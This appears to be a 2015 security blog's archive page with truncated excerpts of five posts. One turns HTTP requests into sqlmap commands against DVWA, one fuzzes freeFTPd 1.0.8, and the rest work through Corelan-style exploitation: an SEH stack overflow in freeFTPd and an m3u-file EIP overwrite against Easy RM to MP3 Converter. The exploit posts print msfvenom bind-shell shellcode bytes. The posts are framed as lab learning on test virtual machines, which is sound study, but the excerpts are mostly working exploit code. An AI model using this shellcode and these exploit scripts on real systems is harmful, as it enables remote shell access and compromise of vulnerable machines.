Posts

Showing posts from July, 2015

Python script to convert an HTTP Web Request to a sqlmap Command

Image
Today I was working with OWASP ZAP and sqlmap for some testing.  I found that for the testing that I was doing I needed a script to automate the creation of the sqlmap command from the input of a HTTP web request.  I will demonstrate how I am utilizing it below:

Below is a screen shot of OWASP ZAP area where the request is shown after it is configured to show a combined view of the header and the content.


This is an example of an HTTP POST request during the login stage of getting into DVWA.  Then inside this box you can right-click, hover over Save Raw, Request, and then click on All.  This will bring up a save dialog box.  Where you saved the below script, create a folder called "requests".  Then save the HTTP Request in that folder.  If you are running Kali you do not need to be root to execute this script.

Here is the script that converts the POST Request into a sqlmap command and then it will execute it upon a key press:

#!/usr/bin/python import os import sys additio…

Fuzzer for freeFTPd 1.0.8

From working with freeFTPd 1.0.8 in the previous post and finding that a buffer overflow could occur on the username field if I enabled logging.  I build the below script to test other functions of the FTP server.  I developed the below fuzzer to identify them, however none surfaced.  I also experimented with unicode characters.

#!/usr/bin/python import socket server = '172.16.102.142' # Change to the IP Address of Windows 7 SP1 VM destPort = 21 hexValues = ["\x00","\x01","\x02","\x03","\x04","\x05","\x06","\x07","\x08","\x09","\x0a","\x0b","\x0c","\x0d","\x0e","\x0f","\x10","\x11","\x12","\x13","\x14","\x15","\x16","\x17","\x18","\x19","\x1a","\x1b","\x1c","\x1d","\x1e&quo…

freeFTPd 1.0.8 - SEH Stack Based Overflow

Image
Exploiting the freeFTPd 1.0.8 server that has an SEH Stack Based Overflow.  This is already documented as a metasploit module and other exploits that have been published.  I have downloaded the vulnerable freeFTPd 1.0.8 server from here.  Then I installed it on Windows XP SP2 with Immunity Debugger.  To configure the freeFTPd server create a user with username of ftp and a password of ftp.  Then enable logging so it writes to a file.

First I created a python script to simulate a logon:

#!/usr/bin/python import socket server = '172.16.104.42' # Change to the IP Address of Windows XP SP2 VM destPort = 21 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, destPort)) # Receive the Banner that is returned after the initial connection print s.recv(1024) # Send the username to login with userString = "USER ftp\r\n" s.send(userString) print userString print s.recv(1024) # Send the password to login with passString = "PASS ftp\r\n&q…

Reviewing Corelan Exploit Writing Part 2

I was reviewing the Corelan Exploit Tutotials Part 2 located here.  Below is the python code that I have created following the tutorial.

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
buf += "\xb5\x7f\x84\x0e\x46\xd3\xf4\x11\xc4\x2e\x29\xf1\xf5"
buf += "\xe0\x3c\xf0\x32\x1c\xcc\xa0\xeb\x6a\x63\x54\x9f\x27"
buf += "\xb…

Reviewing Corelan Exploit Writing Part 1

I reviewed the exploit writing tutorial that Corelan makes available here.  After going through the tutorial I developed the following final script that will create the m3u file that overwrites the EIP with a JMP to ESP in the dlls of the Easy RM to MP3 Converter.  

My final script is below:

#!/usr/bin/python

# msfvenom -p windows/shell_bind_tcp LPORT=4444 -b '\x00\x20\x0a\x0d' -f python
# No platform was selected, choosing Msf::Module::Platform::Windows from the payload
# No Arch selected, selecting Arch: x86 from the payload
# Found 22 compatible encoders
# Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
# x86/shikata_ga_nai succeeded with size 355 (iteration=0)
buf =  ""
buf += "\xbb\x06\xf1\x81\xb7\xdd\xc3\xd9\x74\x24\xf4\x58\x31"
buf += "\xc9\xb1\x53\x31\x58\x12\x83\xe8\xfc\x03\x5e\xff\x63"
buf += "\x42\xa2\x17\xe1\xad\x5a\xe8\x86\x24\xbf\xd9\x86\x53"
buf += "\xb4\x4a\x37\x17\x98\x66\xbc\x75\x08\xfc\xb0\x51\x3f"
bu…